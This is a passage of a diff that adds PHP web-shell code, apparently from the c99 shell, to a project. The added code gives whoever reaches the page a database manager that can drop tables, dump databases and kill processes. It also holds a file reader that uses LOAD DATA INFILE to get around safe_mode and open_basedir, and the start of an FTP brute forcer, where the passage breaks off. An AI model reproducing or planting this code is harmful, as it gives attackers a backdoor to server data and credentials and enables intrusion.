value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+ //Start left panel
+ if (!empty($sql_db))
+ {
+ ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+ $result = mysql_list_tables($sql_db);
+ if (!$result) {echo mysql_smarterror();}
+ else
+ {
+ echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+ $c = 0;
+ while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>?nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+ if (!$c) {echo "No tables found in database.";}
+ }
+ }
+ else
+ {
+ ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+ $result = mysql_list_dbs($sql_sock);
+ if (!$result) {echo mysql_smarterror();}
+ else
+ {
+ ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+ $c = 0;
+ $dbs = "";
+ while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+ echo "<option value=\"\">Databases (".$c.")</option>";
+ echo $dbs;
+ }
+ ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+ }
+ //End left panel
+ echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+ //Start center panel
+ $diplay = TRUE;
+ if ($sql_db)
+ {
+ if (!is_numeric($c)) {$c = 0;}
+ if ($c == 0) {$c = "no";}
+ echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+ if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+ echo "</b></center>";
+ $acts = array("","dump");
+ if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+ elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+ elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+ elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+ elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+ elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+ elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+ elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." 
LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" 
name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr> + <td width="30%" height="1"><b>Create a new table:</b> + <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td> + + <td width="30%" height="1"><b>Dump DataBase:</b> + <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" 
height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" 
value=\"1\" checked>"; + echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! 
Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." 
rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option 
value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "[Pages]&nbsp;"; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo "&nbsp;";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" 
value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + 
$v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;"; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo 
"<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>?/b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DataBase:</b> + <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); 
?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") 
+ { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) 
{$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>FTP Brute Forcer: </b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." 
